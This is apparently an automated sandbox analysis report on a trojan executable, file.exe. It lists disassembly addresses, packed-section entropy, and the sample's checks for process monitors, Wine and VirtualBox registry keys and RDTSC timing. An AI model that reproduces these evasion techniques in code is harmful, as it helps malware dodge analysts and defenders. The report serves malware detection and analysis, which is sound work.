    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA20300_2_00BA2030
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B910000_2_00B91000
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD40400_2_00BD4040
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9E1A00_2_00B9E1A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D621F20_2_00D621F2
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B971F00_2_00B971F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B951600_2_00B95160
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D372DB0_2_00D372DB
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCF2C90_2_00DCF2C9
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5B2E90_2_00D5B2E9
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D6029E0_2_00D6029E
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B912F70_2_00B912F7
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C9A2980_2_00C9A298
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D512800_2_00D51280
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC82D00_2_00BC82D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC12D00_2_00BC12D0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C3E2010_2_00C3E201
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9B3A00_2_00B9B3A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B913A30_2_00B913A3
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC23E00_2_00BC23E0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D563660_2_00D56366
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9A3000_2_00B9A300
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA049B0_2_00BA049B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA44870_2_00BA4487
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC64F00_2_00BC64F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D644B40_2_00D644B4
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4246F0_2_00D4246F
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BBC4700_2_00BBC470
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B935B00_2_00B935B0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B985900_2_00B98590
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAC5F00_2_00BAC5F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4E5350_2_00D4E535
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD86F00_2_00BD86F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DCF6880_2_00DCF688
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCF6200_2_00BCF620
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD86520_2_00BD8652
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9164F0_2_00B9164F
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCE8A00_2_00BCE8A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CA38EA0_2_00CA38EA
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BCB8C00_2_00BCB8C0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5E81F0_2_00D5E81F
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC18600_2_00BC1860
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9A8500_2_00B9A850
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD89A00_2_00BD89A0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB098B0_2_00BB098B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D4C9270_2_00D4C927
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5992A0_2_00D5992A
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD7AB00_2_00BD7AB0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD8A800_2_00BD8A80
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD4A400_2_00BD4A40
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B97BF00_2_00B97BF0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BADB6F0_2_00BADB6F
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD6CBF0_2_00BD6CBF
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BBCCD00_2_00BBCCD0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD8C020_2_00BD8C02
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BBDD290_2_00BBDD29
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BBFD100_2_00BBFD10
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB8D620_2_00BB8D62
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA6EBF0_2_00BA6EBF
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9BEB00_2_00B9BEB0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA4E2A0_2_00BA4E2A
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D5CE410_2_00D5CE41
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD8E700_2_00BD8E70
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D52E0D0_2_00D52E0D
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BBAE570_2_00BBAE57
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B98FD00_2_00B98FD0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BD7FC00_2_00BD7FC0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9AF100_2_00B9AF10
    Source: C:\Users\user\Desktop\file.exeCode function: String function: 00BAD300 appears 152 times
    Source: C:\Users\user\Desktop\file.exeCode function: String function: 00B9CAA0 appears 48 times
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: file.exeStatic PE information: Section: ZLIB complexity 0.9994714315181518
    Source: file.exeStatic PE information: Section: ulxmnlbd ZLIB complexity 0.9945931639443436
    Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@10/2
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC8220 CoCreateInstance,0_2_00BC8220
    Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: file.exeVirustotal: Detection: 53%
    Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
    Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: file.exeStatic file information: File size 1863168 > 1048576
    Source: file.exeStatic PE information: Raw size of ulxmnlbd is bigger than: 0x100000 < 0x19d400

    Data Obfuscation

    barindex
    Detected unpacking (changes PE section rights)
    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.b90000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ulxmnlbd:EW;llihilhx:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ulxmnlbd:EW;llihilhx:EW;.taggant:EW;
    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
    Source: file.exeStatic PE information: real checksum: 0x1d2b2f should be: 0x1c7ca7
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: .rsrc
    Source: file.exeStatic PE information: section name: .idata
    Source: file.exeStatic PE information: section name:
    Source: file.exeStatic PE information: section name: ulxmnlbd
    Source: file.exeStatic PE information: section name: llihilhx
    Source: file.exeStatic PE information: section name: .taggant
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A0C3 push 17287D85h; mov dword ptr [esp], edi0_2_00D1A117
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D1A0C3 push ecx; mov dword ptr [esp], edi0_2_00D1A18A
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E400C2 push 131A4790h; mov dword ptr [esp], edx0_2_00E400EA
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E400C2 push 3AC60D22h; mov dword ptr [esp], edx0_2_00E40140
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E820D1 push edi; mov dword ptr [esp], ebx0_2_00E820DE
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E45060 push 57CFA0B7h; mov dword ptr [esp], ecx0_2_00E45074
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E45060 push ebx; mov dword ptr [esp], edx0_2_00E4514C
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E45060 push edx; mov dword ptr [esp], ebp0_2_00E451A2
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE7043 push 6E21B3CEh; mov dword ptr [esp], edi0_2_00DE709A
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DD7079 push 00F0ED1Ch; mov dword ptr [esp], ebp0_2_00DD7091
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E31059 push ebx; mov dword ptr [esp], ebp0_2_00E3107D
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DF6064 push ebp; mov dword ptr [esp], ebx0_2_00DF60E5
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DE4011 push esi; mov dword ptr [esp], edx0_2_00DE4015
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D621F2 push ecx; mov dword ptr [esp], 0A7774A7h0_2_00D62224
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D621F2 push edi; mov dword ptr [esp], 1AB94CBDh0_2_00D62232
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D621F2 push esi; mov dword ptr [esp], 55BFC2A1h0_2_00D62389
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D621F2 push edi; mov dword ptr [esp], edx0_2_00D623E6
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D621F2 push ecx; mov dword ptr [esp], edx0_2_00D623FA
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D621F2 push ebp; mov dword ptr [esp], ebx0_2_00D62416
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D621F2 push ebp; mov dword ptr [esp], 41BDA180h0_2_00D6249F
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D621F2 push 73209117h; mov dword ptr [esp], esi0_2_00D62543
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D621F2 push 6A1879D2h; mov dword ptr [esp], ecx0_2_00D62553
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D621F2 push edx; mov dword ptr [esp], 47E721BEh0_2_00D62557
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D621F2 push 53593201h; mov dword ptr [esp], eax0_2_00D6257B
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D621F2 push 79690466h; mov dword ptr [esp], edx0_2_00D625A1
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D621F2 push 15585F18h; mov dword ptr [esp], esi0_2_00D62602
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D621F2 push edx; mov dword ptr [esp], eax0_2_00D6261A
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D621F2 push edi; mov dword ptr [esp], eax0_2_00D62648
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D621F2 push edi; mov dword ptr [esp], ebx0_2_00D626D7
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D621F2 push ecx; mov dword ptr [esp], esi0_2_00D626F0
    Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D621F2 push esi; mov dword ptr [esp], 277B896Bh0_2_00D62751
    Source: file.exeStatic PE information: section name: entropy: 7.981198365212424
    Source: file.exeStatic PE information: section name: ulxmnlbd entropy: 7.9532776057509755

    Boot Survival

    barindex
    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior

    Malware Analysis System Evasion

    barindex
    Tries to detect sandboxes / dynamic malware analysis system (registry check)
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
    Tries to detect virtualization through RDTSC time measurements
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF40A4 second address: BF38EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov dword ptr [esp], eax 0x00000009 jns 00007F9F24D1BA77h 0x0000000f push dword ptr [ebp+122D0E51h] 0x00000015 jmp 00007F9F24D1BA7Fh 0x0000001a cmc 0x0000001b call dword ptr [ebp+122D2815h] 0x00000021 pushad 0x00000022 jc 00007F9F24D1BA89h 0x00000028 xor eax, eax 0x0000002a clc 0x0000002b mov edx, dword ptr [esp+28h] 0x0000002f jmp 00007F9F24D1BA84h 0x00000034 add dword ptr [ebp+122D1943h], ebx 0x0000003a mov dword ptr [ebp+122D34CEh], eax 0x00000040 jmp 00007F9F24D1BA80h 0x00000045 mov esi, 0000003Ch 0x0000004a jl 00007F9F24D1BA8Fh 0x00000050 pushad 0x00000051 jmp 00007F9F24D1BA81h 0x00000056 xor dword ptr [ebp+122D1943h], ecx 0x0000005c popad 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 jmp 00007F9F24D1BA88h 0x00000066 lodsw 0x00000068 add dword ptr [ebp+122D1943h], ecx 0x0000006e jng 00007F9F24D1BA84h 0x00000074 pushad 0x00000075 mov eax, dword ptr [ebp+122D34FAh] 0x0000007b jng 00007F9F24D1BA76h 0x00000081 popad 0x00000082 add eax, dword ptr [esp+24h] 0x00000086 jmp 00007F9F24D1BA7Bh 0x0000008b mov ebx, dword ptr [esp+24h] 0x0000008f jno 00007F9F24D1BA82h 0x00000095 push eax 0x00000096 push edx 0x00000097 pushad 0x00000098 push eax 0x00000099 push edx 0x0000009a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6870A second address: D68732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F2573ED25h 0x00000009 pop ecx 0x0000000a ja 00007F9F2573ED1Eh 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D689E8 second address: D689EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68B87 second address: D68B97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F9F2573ED16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D68B97 second address: D68B9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6BA1F second address: D6BA25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6BA25 second address: D6BA5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b pushad 0x0000000c jg 00007F9F24D1BA76h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 jc 00007F9F24D1BA78h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e mov eax, dword ptr [eax] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F9F24D1BA85h 0x00000027 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6BAF2 second address: D6BAF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6BAF6 second address: D6BB7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 nop 0x00000008 jmp 00007F9F24D1BA87h 0x0000000d push 00000000h 0x0000000f adc edi, 0AFC6941h 0x00000015 push 13FBD682h 0x0000001a pushad 0x0000001b jnp 00007F9F24D1BA83h 0x00000021 jmp 00007F9F24D1BA7Dh 0x00000026 push ecx 0x00000027 push esi 0x00000028 pop esi 0x00000029 pop ecx 0x0000002a popad 0x0000002b xor dword ptr [esp], 13FBD602h 0x00000032 mov dword ptr [ebp+122D28F2h], esi 0x00000038 mov dword ptr [ebp+122D3062h], ebx 0x0000003e push 00000003h 0x00000040 jnp 00007F9F24D1BA82h 0x00000046 push 00000000h 0x00000048 mov dword ptr [ebp+122D1E9Ch], ecx 0x0000004e push 00000003h 0x00000050 or di, 0DA5h 0x00000055 push 6448B579h 0x0000005a je 00007F9F24D1BA80h 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6BB7F second address: D6BBAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 add dword ptr [esp], 5BB74A87h 0x0000000e mov dword ptr [ebp+122D2841h], ecx 0x00000014 lea ebx, dword ptr [ebp+1244B944h] 0x0000001a and esi, dword ptr [ebp+122D1BBDh] 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 push ebx 0x00000024 jbe 00007F9F2573ED16h 0x0000002a pop ebx 0x0000002b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6BC16 second address: D6BC1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6BE34 second address: D6BE38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6BF27 second address: D6BF2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6BF2B second address: D6BF31 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6BF31 second address: D6BF3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F9F24D1BA76h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D6BF3B second address: D6BF3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D89618 second address: D8961C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D89737 second address: D8974B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9F2573ED1Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8989D second address: D898A7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9F24D1BA7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D898A7 second address: D898D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F2573ED1Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9F2573ED28h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D898D2 second address: D898F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F24D1BA87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D89AA0 second address: D89AA8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D89AA8 second address: D89AB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F9F24D1BA76h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D89AB2 second address: D89AB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D89DB3 second address: D89DCF instructions: 0x00000000 rdtsc 0x00000002 je 00007F9F24D1BA76h 0x00000008 jmp 00007F9F24D1BA7Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D89DCF second address: D89DD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D89DD3 second address: D89DE0 instructions: 0x00000000 rdtsc 0x00000002 je 00007F9F24D1BA76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D89DE0 second address: D89DF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F9F2573ED16h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F9F2573ED18h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A04A second address: D8A053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop esi 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A1ED second address: D8A201 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9F2573ED1Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A201 second address: D8A23B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9F24D1BA87h 0x00000008 jnp 00007F9F24D1BA76h 0x0000000e jmp 00007F9F24D1BA88h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A363 second address: D8A39C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F9F2573ED16h 0x0000000a popad 0x0000000b push edx 0x0000000c jmp 00007F9F2573ED22h 0x00000011 pop edx 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 pop edx 0x00000016 pushad 0x00000017 jmp 00007F9F2573ED23h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A4C8 second address: D8A4E0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jbe 00007F9F24D1BA76h 0x0000000f pop eax 0x00000010 jl 00007F9F24D1BA82h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A4E0 second address: D8A4E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A4E6 second address: D8A4F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnc 00007F9F24D1BA76h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A4F2 second address: D8A532 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9F2573ED24h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jnp 00007F9F2573ED2Bh 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F9F2573ED23h 0x0000001a push eax 0x0000001b jnc 00007F9F2573ED16h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A7E7 second address: D8A7FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b popad 0x0000000c pushad 0x0000000d jo 00007F9F24D1BA7Eh 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A7FE second address: D8A805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
